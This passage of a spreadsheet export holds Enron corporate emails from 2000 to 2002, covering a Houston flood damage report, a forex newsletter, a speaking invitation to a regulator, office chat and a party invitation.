Cc:	Kaminski, Vince J; Dhar, Amitava_x000D_
Subject:	Report to Professor Duffie_x000D_
_x000D_
Hi Iris,_x000D_
_x000D_
I wasn't sure if you had already sent your report to Professor Duffie yet or not, but I've been thinking about ways that his group (or the Research team) could really add value in an area where we're admittedly weak - model testing.  If you haven't sent the report to him yet, perhaps we can request his opinions on best practices for testing models with limited quality out of sample test sets.  Obviously, I'd like to discuss this in detail with you as well, especially since you understand the characteristics of the models and data better now, but I'll do that via phone.  I'm hoping there are some statistical techniques we're currently ignoring that we can employ to maximize the testing we do and get a better handle on judging our accuracy._x000D_
_x000D_
If you've got some time Tuesday after our meeting where Mike catches us up on the D&amp;B issues, I'd love to get your views as the model testbed is now in place and we're starting a model recalbration phase.  I'm least comfortable about our plans for stress testing the models once we've recalibrated them._x000D_
_x000D_
Looking forward to talking to you Tuesday._x000D_
_x000D_
Regards,_x000D_
Scott_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 14 Jun 2001 13:44:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: FW: Enron Center North/Enron Center South Damage &amp; Restoration_x000D_
 Overview</t>
  </si>
  <si>
    <t xml:space="preserve">	Sorry did not see the email till late, (I had stupidly sorted the email by author) I will po round on Saturday morning and I can take_x000D_
	you trhough my plan. I am delighted to hear little Scott is sleeping._x000D_
_x000D_
	I apologize for not seeing and responding to the email sooner._x000D_
_x000D_
	Take care._x000D_
_x000D_
_x000D_
	P._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kitchen, Louise  _x000D_
Sent:	Wednesday, June 13, 2001 5:48 PM_x000D_
To:	Philippe A Bibi/HOU/ECT@ENRON_x000D_
Subject:	Re: FW: Enron Center North/Enron Center South Damage &amp; Restoration Overview_x000D_
_x000D_
Marcus said you wanted to see me Friday but we are going to the Astros - is there a problem?  I notice you haven't responded to me email._x000D_
_x000D_
Can we talk on the phone or will sometime over the week-end do instead of Friday?_x000D_
_x000D_
Louise_x000D_
---------------------- Forwarded by Louise Kitchen/HOU/ECT on 06/13/2001 05:46 PM ---------------------------_x000D_
_x000D_
 _x000D_
Louise Kitchen_x000D_
06/11/2001 10:53 AM_x000D_
To:	Philippe A Bibi/ENRON@enronXgate @ ENRON_x000D_
cc:	 _x000D_
_x000D_
Subject:	Re: FW: Enron Center North/Enron Center South Damage &amp; Restoration Overview   &lt;&lt; OLE Object: StdOleLink &gt;&gt; _x000D_
_x000D_
Bloody good effort - I thought you'd have lost a lot of systems._x000D_
_x000D_
So how are things - thanks for the message only got it last night as the phones have been down most of the week-end.  We spent the week-end figuring out alternative ways home for Marcus's mum (Indianappolis - New York - London is how she finally got home - obviously her luggage got lost) and also picking up my parents who are now out golfing every hour god sends as no-one else thinks the courses are open.  No other damage though._x000D_
_x000D_
What's my news - nothing exciting - Lavo did ring last week to tell me that everyone is saying I am going back to London, David Port rang Friday and said there were many rumours around (some not so nice too!).  But suffice to say I presume they are all bollocks as no-one has mentioned anything to me!  But then maybe I'll be the last person to get consulted.  Matthew Scrimshaw made the move to EBS so I do have some info there - but I figure you'll already know it as its now 4 days old!    I have never been more up to speed with emails - I only have 5 in my inbox_x000D_
_x000D_
In other news - Scott is finally sleeping more (I got a whole 7 hours last night) so I am back at work on Monday - are you free any time this week for lunch to catch me up on the gossip before I get back?  I could never be a stay at home mum -  I am lacking in all the requried attributes - patience and inability to spend money, with nothing to do apart  from look after Scott - I have become the demon internet spotter._x000D_
_x000D_
Let me know about lunch_x000D_
_x000D_
Regards_x000D_
_x000D_
Louise_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
From:	Philippe A Bibi/ENRON@enronXgate on 06/11/2001 09:17 AM_x000D_
To:	Mark Frevert/ENRON@enronXgate, Greg Whalley/HOU/ECT@ECT_x000D_
cc:	Mike McConnell/HOU/ECT@ECT, Jeffrey A Shankman/ENRON@enronXgate, Jeffrey McMahon/ENRON@enronXgate, Raymond Bowen/ENRON@enronXgate, John J Lavorato/ENRON@enronXgate, Louise Kitchen/LON/ECT@ECT, Rebecca McDonald/ENRON@enronXgate, Kevin Hannon/Enron Communications@Enron Communications, Ken Rice/Enron Communications@Enron Communications _x000D_
_x000D_
Subject:	FW: Enron Center North/Enron Center South Damage &amp; Restoration Overview_x000D_
_x000D_
Mark/Greg,_x000D_
_x000D_
Please find attached a post-mortem of our weekend problems..._x000D_
_x000D_
Summary is last paragraph in red._x000D_
_x000D_
Regards_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Terech, Henry  _x000D_
Sent:	Sunday, June 10, 2001 11:23 PM_x000D_
To:	Bibi, Philippe A.; Donovan, Bill_x000D_
Cc:	Kean, Steven_x000D_
Subject:	Enron Center North/Enron Center South Damage &amp; Restoration Overview_x000D_
_x000D_
Bill/Philippe-_x000D_
_x000D_
Below is a summary of the major problems which occurred the past 96 hours and the steps taken to mitigate the damage and risk._x000D_
_x000D_
Enron Center North (1400 Smith)_x000D_
_x000D_
As a result of the flooding downtown, approximately six skyscrapers had their electrical vaults flooded and began to cause cascading problemd in the electrical grid downtown. The net result was the loss of one of the two 35kv circuits which serve 1400 Smith. We (engineers, EES Maint, electrical subs)  believe at the time the circuits blew we shifted from three phase to single phase power, which caused an imbalance in the load to the building. _x000D_
_x000D_
Consequently, UPS "C" which serves a portion of the Lv 34 Data Ctr, the Rolm phone switch, and a protion of the Traders floors lost a circuitboard, and blew two internal fuses. This power degradation caused PDU "S" on Lv 34 to trip its main breaker and shutdown power load to servers and equipment on this PDU. This occurred shortly after Noon on Saturday._x000D_
_x000D_
Response/Restoration_x000D_
_x000D_
&gt; UPS "D" transferred load from UPS "C" as the N+1 back up and carried the full load of the UPS loss as designed_x000D_
&gt; EPSC/electrical sub (Henderson Electric); EES Maint; IT worked together to power down systems to begin repair work by 4:00pm Saturday_x000D_
&gt; EPSC/EES Maint coordinated with Pillar/Henderson Elec to obtain replacement parts and begin the repairs. By 9:30pm all repairs to UPS"C" had been made and the system bought back on line. As a measure of extra protection the back up genset for Enron Ctr North  was in operation_x000D_
&gt; Reliant Energy restored the circuit at approximately 10:30pm Saturday evening_x000D_
&gt; EPSC/EES Maint and subs conducted a thorough review of all electrical and back up systems Saturday evening_x000D_
&gt; Enron Network IT Operations began restoration of all affected systems Saturday evening_x000D_
&gt; EPSC/EES Maint obtained diesel fuel and topped off all gensets Saturday in case of additional problems and due to fuel consumption during the outage_x000D_
_x000D_
Other Building damage was limited to flooding in the tunnels, and water damage/flooding to portions of the Body Shop on Lv B-1_x000D_
_x000D_
Enron Center South (1500 Louisiana)_x000D_
_x000D_
Impact/Damage Summary_x000D_
_x000D_
&gt; Levels 8 &amp; 9  received very limited amounts of water from the core area elevator shafts and exterior curtainwall. There was no exposure to water on any systems or network cabling during the entire period. (Response) Crews contained and cleaned all water as it traced into the building._x000D_
&gt; ALL IDF closets on Lvs 3-5 Traders Floors remained dry throughout the duration of the rains/flooding on Friday &amp; Saturday_x000D_
&gt; Lv 6 received some water from Lv 7. (Response) The area was contained and cleaned. No additional damage beyond Tuesday evenings flooding occurred_x000D_
&gt; Due to extreme street flooding and water pressure, a 10" sanitary sewer line tied into ECS burst on Friday evening causing extensive flooding of Lv  B-1 area (approximately 4-6 inches of water in the basement. (Response)  Clark &amp; Way Engr was able to install a temporary plug in the line to stop the on going flood waters from penetrating the basement. Clean up has continued throughout the weekend   _x000D_
&gt; Due to the extreme flooding and water pressure, the water seal of the Reliant Vault burst early Saturday and flooded the electrical vault room with 24-30" of water. This resulted in a complete loss of power at approximately 1:30pm on Staurday afternoon. The back up systems engaged and operated per design to support the Data Ctr and Traders Floors. The temporary cooling tower went off line. Prior to the flooding Clark had been in the process of tieing in the temporary feed into the back up system by 7-1-01 in prep for the migration (Response) _x000D_
	* Clark used back up water pumps to pump out and clean the Reliant electrical vault, as well as maintained operation of the back up systems_x000D_
	* The Data Ctr AHU's were kept on line with the dehumidifiers/blowers to modulate the airflow in the Data Ctr. EPSC had Way Engr techs use temp/humidity probes_x000D_
	   to monitor the areas. The recordings indicated temps on Lvs 8 &amp; 9 did not exceed 78 degrees and relative humidity did not exceed 68% during the outage_x000D_
	* Clark/Fisk Elec/EPSC coordinated desing efforts and obtained gear on an emergency basis and completed the tie in off the temporary coolong tower to the _x000D_
	   generators by 10:30pm_x000D_
	* Reliant Energy is still cleaning and replacing gear in th vault room. Presntly (AT 11:00PM Sunday) we have one circuit operational in the building and 50% of the_x000D_
              Reliant  gear on line). We are still operating all systems safely on the back up sytems for the past 36 hours. It is expected Relaint will be complete by 7:00am._x000D_
	  Clark; the engineers and MEP subs shall be conducting a thorough system review and repirs as required of all systems throughout the building during the coming_x000D_
	  week._x000D_
_x000D_
In summary, the back up systems in both facilities did engage and operate as designed; however, due to the extreme conditons and stress placed upon the systems the facility held up extremely well. I would also like to note throughout the ordeal beginning Friday evening through Sunday, everyone (Enron NetWorks;EES FacilitiesClark Const;Way Engring;Fisk Electric;Henderson Electric; KW-Pillar;Hines) did an outstanding job under enourmous pressure and the most severe conditions I have seen in downtown Houston. Communication, around the clock work  and cool heads managed to assess damage and develop action/restoration plans to facilitate repairs for Monday business_x000D_
_x000D_
Let me know if you need further details on specific issues or items._x000D_
_x000D_
regards-_x000D_
_x000D_
Henry_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&lt;Embedded Picture (Device Independent Bitmap)&gt;</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 04:49:54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2.0%  0.15%  3.2=_x000D_
5%  4.0%  1.75-2.75%       [IMAGE] =09 [IMAGE]  Dollar Gives Back Friday's =_x000D_
Gains, But Bull Still Stands  November 26, 7:00 AM: EUR/$..0.8817 $/JPY..12=_x000D_
4.02 GBP/$..1.4177 $/CHF..1.6625  Dollar Gives Back Friday's Gains, But Bul=_x000D_
l Still Stands by Jes Black  No Key Data Today   The dollar fell further in=_x000D_
 European trade, giving back all of last Friday's gains after it soared to =_x000D_
new 15-week highs against the euro and yen at 87.37 cents and 124.48 respec=_x000D_
tively, as well as a new 4-month high against the pound sterling at $1.4042=_x000D_
. EUR/USD regained key support at 87.50 followed by 88.10 and climbed to a =_x000D_
session high of 88.32, stopping just short of last week's highs around 88.3=_x000D_
5. EUR/USD resistance stands at 88.40 followed by 88.80.  GBP/USD also rega=_x000D_
ined support at 1.4120 and rose to a day's high of 1.4203 before meeting to=_x000D_
ugh resistance around the 1.42 figure.  However, the correction in USD was =_x000D_
seen as temporary as today's movement came on the back of a large buy order=_x000D_
 squeezing dollar shorts in the market. Dealers say there appears to be no =_x000D_
demand to chase squeezes or go short USD at these levels, which should mean=_x000D_
 the dollar is likely to remain strong. Therefore, dealers still see a rall=_x000D_
y in EUR/USD towards 88.80 to be sold as the bear trend should resume this =_x000D_
week targeting 87.20 followed by 86.75.   After earlier action, the FX mark=_x000D_
et appears to have moved into a steady range ahead of the return of US deal=_x000D_
ers after the long holiday weekend. However there is no major data due toda=_x000D_
y and markets will instead focus on Eurozone and US Q3 GDP figures due on T=_x000D_
hursday and Friday as well as the Morgan Stanley Capital International inde=_x000D_
x changes at the end of the week. US Q3 GDP is expected to contract by 0.8%=_x000D_
 while the Eurozone could grow by 0.1%. Important to the markets this week =_x000D_
will be any indications contrary to the prevailing notion of the US economy=_x000D_
 recovering in the second half of 2002. This prevailing sentiment has been =_x000D_
key to the recent rally in US equities and the dollar.  In addition, the Fe=_x000D_
d's commitment to growth is another reason the dollar has performed so well=_x000D_
 despite the near certainty of a recession. It is also explains why the Mor=_x000D_
gan Stanley Capital International index is expected to be reweighed in favo=_x000D_
r of US equities at the end of this month. According to the adjustments MSC=_x000D_
I will make, Japan, France and Germany are likely to see a net outflow of c=_x000D_
apital, while the UK and US will be on the receiving end.  Markets will als=_x000D_
o focus on the Federal Reserve's Beige Book on Wednesday because it will gi=_x000D_
ve a good indication for the Fed's next interest rate policy meeting on Dec=_x000D_
ember 11. With parts of the economy showing signs of a turnaround, the prob=_x000D_
ability of further aggressive easing by the Fed has diminished. Markets hav=_x000D_
e priced in only a 30% chance that the Fed will ease by 25 bp next month. L=_x000D_
arge gains in US equities have helped rein in the Fed's accommodating polic=_x000D_
y. The S?500 is up over 15% from its September lows, and as investors show =_x000D_
an increasing appetite for risk, a huge amount of money sitting on the side=_x000D_
lines is waiting to get a better return than in the money market. The US is=_x000D_
 likely to remain the preferred destination for international portfolio flo=_x000D_
ws, which should add to the recent momentum in the USD index, which has ris=_x000D_
en by 5.6% to its highest level since late July at 117.78, and is now less =_x000D_
than 3% away from hitting its 15-year high reached in early July.  Meanwhil=_x000D_
e, JPY came under fresh pressure following the S&amp;P's announcement that it m=_x000D_
ay downgrade Japan's AA+ sovereign debt rating by two notches. USD/JPY rose=_x000D_
 to 124.35 but could not break key technical resistance around 124.45/50. M=_x000D_
arkets were not surprised by the news, which was expected, and sentiment wa=_x000D_
s already bearish after the rating agency Fitch downgraded Japan by one not=_x000D_
ch earlier today. USD/JPY fell below 124 yean to session low of 123.95 afte=_x000D_
r failing to break key technical resistance around 124.45/50. USD/JPY faces=_x000D_
 resistance 124.50 followed by the Aug 01 high of 125 and 125.25-30. Suppor=_x000D_
t is now seen at 124.00 followed by 123.50 with follow-up foundation at 122=_x000D_
.75.  In other news, BoJ Governor Hayami said foreign bond buying was not a=_x000D_
n urgent issue. This could be seen as yen supportive. However, earlier in t=_x000D_
he day FinMin Shiokawa said he had not heard from the central bank about th=_x000D_
e possibility of the BoJ purchasing foreign bonds as part of its monetary p=_x000D_
olicy operations. Therefore, his comment suggests that the BoJ acknowledges=_x000D_
 foreign bond buying is possible which would be yen negative, thus making t=_x000D_
oday's impact on JPY a wash. Recall that JPY came under pressure last week =_x000D_
following an article in the FT citing the US administration's acceptance of=_x000D_
 the BoJ buying US T bills.  GBP/USD also regained support at 1.4120 and ro=_x000D_
se to a day's high of 1.4203 after plunging to a 4-month low of 1.4042 on F=_x000D_
riday. Sterling stumbled following Prime Minister Blair's speech which show=_x000D_
ed strong enthusiasm for the UK joining European Monetary Union. In the pas=_x000D_
t, any reference has caused a knee jerk reaction. However, given the uncert=_x000D_
ain time frame and the need for the 5 economic criteria suggested by Treasu=_x000D_
ry Minister Gordon Brown to be met, GBP recovered all of its losses. EUR/GB=_x000D_
P also fell to a session low of 62.10.  USD/CHF fell to a session low of 1.=_x000D_
6588 but continues to trade in a comfortable range of 1.65 to 1.67 since su=_x000D_
rging over 5 centimes two week's ago to a high of 1.6753. It will be a key =_x000D_
week ahead for the Switzerland, with Q3 employment data due on Tuesday foll=_x000D_
owed by the October KOF indicator on Friday set to show more weakness in bu=_x000D_
siness activity. Meanwhile, inflation data for November should show a large=_x000D_
 decline as oil prices fall worldwide.  =09[IMAGE] Audio Mkt. Analysis USD =_x000D_
on a Tear After S?warning, Ifo, Umich Survey       Articles &amp; Ideas  Sidewa=_x000D_
ys Action, Then Weaker Euro Ahead   USD/JPY: The Next Level       Articles =_x000D_
&amp; Ideas Forex Glossary   Economic Indicators   Forex Guides   Link Library =_x000D_
     [IMAGE] =09_x000D_
=09=09[IMAGE][IMAGE] [IMAGE][IMAGE]=09_x000D_
=09=09  This e-mail is never sent unsolicited. If you wish to unsubscribe f=_x000D_
rom this or any other Forexnews.com newsletters, please click here .  =09_x000D_
</t>
  </si>
  <si>
    <t>Thu, 31 May 2001 02:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Yes, they are deducting for parking</t>
  </si>
  <si>
    <t xml:space="preserve">You definitely have to have patience to deal with all the "stuff" around _x000D_
here.  It's a good thing I've mellowed. Plus, it's my job.  _x000D_
_x000D_
Michael is a doll!  I don't think it's supposed to rain on Saturday, but that _x000D_
could change at any moment.  The Women's Center needs all kinds of things.  I _x000D_
have a friend that works for the United Way and goes over there quite often.  _x000D_
If you have clothes, they want you to take them to their Resale shop but they _x000D_
also need linens, just everything really.  I usually give my things to _x000D_
Kristine's church just because I always forget to put them in the truck and _x000D_
bring up here.  _x000D_
_x000D_
I've got next Thursday and Friday on my calendar.  I hope you guys have a _x000D_
great time.  21, I remember that, wild child that I was!  Any of the camera _x000D_
places should be able to do that enlargement.  I know Wolfe Camera over at _x000D_
Allen Center does that type of thing.  I don't know how long it will take to _x000D_
get it back.  What exactly do you want to get done, and I'll call and _x000D_
inquire.  I'll need the size you want it mounted to also._x000D_
_x000D_
_x000D_
_x000D_
	Kay Mann@ENRON_x000D_
	05/31/2001 09:21 AM_x000D_
		_x000D_
		 To: Suzanne Adams/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Re: Yes, they are deducting for parking_x000D_
_x000D_
This place amazes me!  Thanks for  your help.  I have no patience for it._x000D_
_x000D_
We went to Michael's school conference today.  His teacher raved about how _x000D_
everyone just loves Michael. He is so sweet.  He is staying with my folks _x000D_
this week, and the 3 of us miss him so badly.  I can't wait for him to come _x000D_
home.  Neil is going to meet my folks and Michael in Palacios this Friday, _x000D_
and spend the weekend there, bringing him home on Sunday.  I've got to take _x000D_
Roscoe for his last mange shot, so I'm staying.  Plus, I spent last weekend _x000D_
with my folks, and too much exposure doesn't work for us.  I hope to  PURGE _x000D_
the house of all the junk I have.  I hope it is raining, because  that is _x000D_
great cleaning weather.  I want to see bare space in my closet.  I think I'll _x000D_
call the Women's Center and see what type of stuff they need._x000D_
_x000D_
I'm planning on taking next Thursday and Friday off.  Next Thursday is _x000D_
Paige's 21st birthday, so we have great plans.  Do you know anywhere that can _x000D_
enlarge a photo and mount it on a board?_x000D_
_x000D_
I still get a bill for the card they used previously for my phone.  Go figure._x000D_
_x000D_
I need to send off my Tx tax and bar dues today.  I'll want to fed ex, just _x000D_
in case you are sending anyone else's today._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
From: Suzanne Adams@ECT on 05/31/2001 09:12 AM_x000D_
To: Kay Mann/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Yes, they are deducting for parking  _x000D_
_x000D_
Let me see what I can do.  I can't believe you haven't gotten any kind of _x000D_
notice.  _x000D_
_x000D_
I still need your credit card information for the phone bill._x000D_
_x000D_
_x000D_
_x000D_
	Kay Mann@ENRON_x000D_
	05/31/2001 09:03 AM_x000D_
		 _x000D_
		 To: Suzanne Adams/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Yes, they are deducting for parking_x000D_
_x000D_
How do I get on the list for the form?  Could you pretty please check for me?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 23 Mar 2001 05:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: ???</t>
  </si>
  <si>
    <t>That's funny, that they still had the same outfit you looked at back in the _x000D_
fall.  If I'm not mistaken, the "O" magazine, the one that Oprah Winfrey _x000D_
publlishes had a coupon for August Max stores.  I'm not sure iif it was this _x000D_
issue or last month, but call the store and see, and it may be worth buying a _x000D_
magazine for the coupon.  I'm not surprised about Hope, it was such a late _x000D_
night.  See you later</t>
  </si>
  <si>
    <t>Sun, 8 Jul 2001 05:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'klay@enron.com', 'skean@enron.com', 'rosalee.fleming@enron.com'})</t>
  </si>
  <si>
    <t>London advisory council meeting</t>
  </si>
  <si>
    <t>HEREWITH A LETTER THAT KEN MIGHT WANT TO SEND TO CALLUM MCCARTHY_x000D_
Dear Callum,_x000D_
I much enjoyed chatting with you in Aspen: it is always a relief to meet_x000D_
a regulator who tries to get the process right, and then lets the chips fall_x000D_
where they may._x000D_
In its efforts to remain open to new ideas, Enron has established an_x000D_
advisory council consisting of academics, business people, political gurus_x000D_
and the like (Irwin Stelzer is a member). This council meets twice a year_x000D_
with Enron executives. Our next meeting is scheduled for October 31 at our_x000D_
London headquarters ( we have a dinner the previous evening, at which we_x000D_
review the state of political play around the world; you might find it_x000D_
interesting)._x000D_
One of the suggestions at the Aspen meeting was that traditional_x000D_
regulation of energy markets might usefully give way to, or at least learn_x000D_
some lessons from, financial regulation. Since you are one of the few_x000D_
regulators who has had experience both in financial markets and in utility_x000D_
regulation, we are hoping that you might be willing to share some ideas with_x000D_
us on this subject. A 30-minute talk followed by what I promise will be a_x000D_
very lively discussion would be perfect from our point of view._x000D_
We know how pressed you are for time, but are hoping you will favor us_x000D_
with your thoughts on this interesting and difficult subject._x000D_
KEN: I don't think you can offer him a fee.</t>
  </si>
  <si>
    <t>Mon, 4 Mar 2002 06:38:18 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bill.rapp@enron.com', 'jan.moore@enron.com', 'tk.lohman@enron.com', 'lorraine.lindberg@enron.com', 'audrey.robertson@enron.com', 'kevin.hyatt@enron.com', 'steven.harris@enron.com', 'james.centilli@enron.com', 'michelle.lokay@enron.com', 'kimberly.watson@enron.com', 'lindy.donoho@enron.com', "paul.y'barbo@enron.com"})</t>
  </si>
  <si>
    <t>Dinner to be rescheduled</t>
  </si>
  <si>
    <t>_x000D_
All,_x000D_
_x000D_
When I set the date for the dinner at our house, I forgot that it was around "Spring Break".  So, not wanting to cause any conflict in schedule and wanting to help promote family time, I decided to CANCEL the dinner for March 16 and RESCHEDULE for another time.  Sarah and I look forward to having everyone over so we'll put our heads together and come up with a better date._x000D_
_x000D_
Hope this hasn't caused any inconvenience,_x000D_
_x000D_
Mark_x000D_
_x000D_
_x000D_
_x000D_
Mark McConnell_x000D_
Transwestern Pipeline Company_x000D_
713-345-7896   office_x000D_
713-822-4862   cell_x000D_
713-646-2551   fax_x000D_
mark.mcconnell@enron.com</t>
  </si>
  <si>
    <t>Tue, 29 Feb 2000 02:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'chris.germany@enron.com', 'christina_sanchez@enron.com', 'jcasas2@enron.com', 'scott.goodell@enron.com'})</t>
  </si>
  <si>
    <t>Final volumes</t>
  </si>
  <si>
    <t>Please see the Mar-00 spreadsheet which shows my IBSS withdrawals and what I'm_x000D_
estimating to be the total capacity numbers from ETNG and Transco._x000D_
_x000D_
David_x000D_
_x000D_
_x000D_
_x000D_
 - CES-AGL-Feb00.xls_x000D_
 - CES-AGL-Mar00.xls</t>
  </si>
  <si>
    <t>Thu, 20 Dec 2001 05:38:33 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: FROM CINDY OLSON, COMMUNITY RELATIONS:  Discount Tickets to The_x000D_
 Nutcracker</t>
  </si>
  <si>
    <t>Do you want to go?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Enron General Announcements  _x000D_
Sent:	Wednesday, December 19, 2001 5:03 PM_x000D_
To:	DL-GA-all_enron_houston_employees_x000D_
Subject:	FROM CINDY OLSON, COMMUNITY RELATIONS:  Discount Tickets to The Nutcracker_x000D_
_x000D_
_x000D_
Dear Enron Employee:_x000D_
_x000D_
Houston Ballet is presenting The Nutcracker through Sunday, December 30.  The production has been hailed by the Houston chronicle as "the crown jewel of holiday entertainment," and is a perfect introduction to the world of ballet for families and audiences of all ages.  Enron has been a long-time supporter of the Ballet, and we would like to thank you with a special invitation from Houston Ballet and TicketMaster for discount tickets to The Nutcracker._x000D_
_x000D_
Click on the following links below to receive a 25% discount on tickets to any of the selected performances of The Nutcracker._x000D_
_x000D_
To place your order, click on the link below to choose your day and time.  When requesting your tickets, you may choose from best available seats or a specific section, however, all ticket prices may not be available.  Ticketmaster service and handling charges will apply to your order._x000D_
_x000D_
Your company code is: NUT1._x000D_
_x000D_
Happy Holidays and enjoy Houston Ballet._x000D_
_x000D_
Performance Dates and Times:_x000D_
_x000D_
Wednesday, December 26 at 7:30pm_x000D_
https://ticketing.ticketmaster.com/cgi/purchasePage.asp?event_id=C003345C3DE86FB&amp;event_code=EHL1226_x000D_
_x000D_
Thursday, December 27 at 7:30pm_x000D_
https://ticketing.ticketmaster.com/cgi/purchasePage.asp?event_id=C003345D10FB243&amp;event_code=EHL1227_x000D_
_x000D_
Saturday, December 29 at 2:00pm_x000D_
https://ticketing.ticketmaster.com/cgi/purchasePage.asp?event_id=C003345CDB2A7A1&amp;event_code=EHL1229M_x000D_
_x000D_
Sunday, December 30 at 2:00pm_x000D_
https://ticketing.ticketmaster.com/cgi/purchasePage.asp?event_id=C003345CDDBA7F9&amp;event_code=EHL1230M</t>
  </si>
  <si>
    <t>Mon, 10 Jul 2000 03:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Draft of Enron CPCN Application - Richmond Project</t>
  </si>
  <si>
    <t xml:space="preserve"> Allyson called Friday afternoon to tell me they would be sending this out _x000D_
Friday, and it needed to be reviewed quickly.  It never came.  I left a _x000D_
message Friday afternoon, asking where it was.  They sent it to me on _x000D_
Saturday. I left out the really bad part.  I had to leave early on Friday _x000D_
because Michael's sitter (who picks him up from school everyday) had a heart _x000D_
attack.  She's still in St. Luke's._x000D_
_x000D_
I'll take a look at it._x000D_
_x000D_
ckm_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Lisa Mellencamp@ECT_x000D_
07/10/2000 10:01 AM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Draft of Enron CPCN Application - Richmond Project_x000D_
_x000D_
did you get this??_x000D_
_x000D_
Lisa J. Mellencamp_x000D_
Enron North America Corp._x000D_
1400 Smith St._x000D_
Houston, TX  77002_x000D_
Tel:  (713) 853-7986_x000D_
Fax: (713) 646-3393_x000D_
----- Forwarded by Lisa Mellencamp/HOU/ECT on 07/10/2000 10:01 AM -----_x000D_
_x000D_
	"Fine, Jonathan" &lt;JFine@kilstock.com&gt;_x000D_
	07/07/2000 04:10 PM_x000D_
		 _x000D_
		 To: "'jeffrey.m.keenan@enron.com'" &lt;jeffrey.m.keenan@enron.com&gt;, _x000D_
"'heather.kroll@enron.com'" &lt;heather.kroll@enron.com&gt;, _x000D_
"'tom.chapman@enron.com'" &lt;tom.chapman@enron.com&gt;, _x000D_
"'lisa.mellencamp@enron.com'" &lt;lisa.mellencamp@enron.com&gt;_x000D_
		 cc: "'jcrose@prodigy.net'" &lt;jcrose@prodigy.net&gt;, "Duncan, Allyson" _x000D_
&lt;aduncan@kilstock.com&gt;_x000D_
		 Subject: Draft of Enron CPCN Application - Richmond Project_x000D_
_x000D_
_x000D_
Attached for your review and comment is the latest draft of the CPCN_x000D_
application to be submitted on Monday.  Please provide your comments, if_x000D_
any, by Monday morning so that we can file the application and Jeffrey's_x000D_
testimony that afternoon._x000D_
_x000D_
Thank you._x000D_
_x000D_
Also - Jeffrey:  in addition to the materials you are sending overnight_x000D_
tonight, we wanted to remind you about sending your bio for inclusion in_x000D_
your testimony.  You can e-mail, if you prefer.  Thanks._x000D_
_x000D_
Also - Heather - wanted to confirm that you will be taking the lead on_x000D_
putting together the cost estimate, which we will submit under seal as a_x000D_
supplement to the application.  Thanks._x000D_
_x000D_
Jonathan M. Fine_x000D_
Kilpatrick Stockton, LLP_x000D_
3737 Glenwood Ave., Ste. 400_x000D_
Raleigh, NC 27612_x000D_
TEL: (919) 420-1700_x000D_
FAX: (919) 420-1800_x000D_
_x000D_
_x000D_
 &lt;&lt;Enron CPCN Application.DOC&gt;&gt;_x000D_
_x000D_
 - Enron CPCN Application.DOC_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 30 Nov 2001 13:41:08 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'j.bagwell@enron.com'})</t>
  </si>
  <si>
    <t>RE: Bankruptcy Party at PLove's tonight</t>
  </si>
  <si>
    <t>_x000D_
party killed to due to bad spirits down here._x000D_
PL_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Love, Phillip M.  _x000D_
Sent:	Friday, November 30, 2001 3:19 PM_x000D_
To:	Bagwell, Jennifer J_x000D_
Subject:	FW: Bankruptcy Party at PLove's tonight_x000D_
_x000D_
fyi if you want to come, I invited my whole group._x000D_
PL_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Love, Phillip M.  _x000D_
Sent:	Friday, November 30, 2001 2:54 PM_x000D_
To:	Keiser, Kam; Palmer, B. Scott; Winfree, O'Neal D.; Valdes, John; McLaughlin Jr., Errol; Gossett, Jeffrey C._x000D_
Subject:	Bankruptcy Party at PLove's tonight_x000D_
_x000D_
Send to your group's please.  _x000D_
_x000D_
_x000D_
If you feel like drowning your sorrows at the end of the world in some free keg beer, sodas and hard liquor - come down to Clear Lake and celebrate the fact that today may be the last paycheck you receive from Enron.  Playstation, pool, and darts(with pictures of great Enron leaders) will be available for your enjoyment.  You can also try chase the 3 year old with the dirty diaper.  Party starts about 7 ish.  We will order Pizza or something like that if you haven't eaten.  Directions:_x000D_
I - 45 South to exit 29 - CLC Blvd._x000D_
Turn left under the freeway - heading east_x000D_
You will travel roughly four miles (through 3 lights and two stop signs) turn left on Noble Pine(across from Children's World) _x000D_
When that street dead end's take a right on Towering Oak_x000D_
Take first left onto Cherry Oak_x000D_
That dead end's at Sterling Wood Way - take a left._x000D_
Third house of the right 4435 Sterling Wood Way_x000D_
281-486-7026_x000D_
_x000D_
Hope to see everyone there._x000D_
PL</t>
  </si>
  <si>
    <t>Wed, 9 Jan 2002 13:53:12 -0800 (PST)</t>
  </si>
  <si>
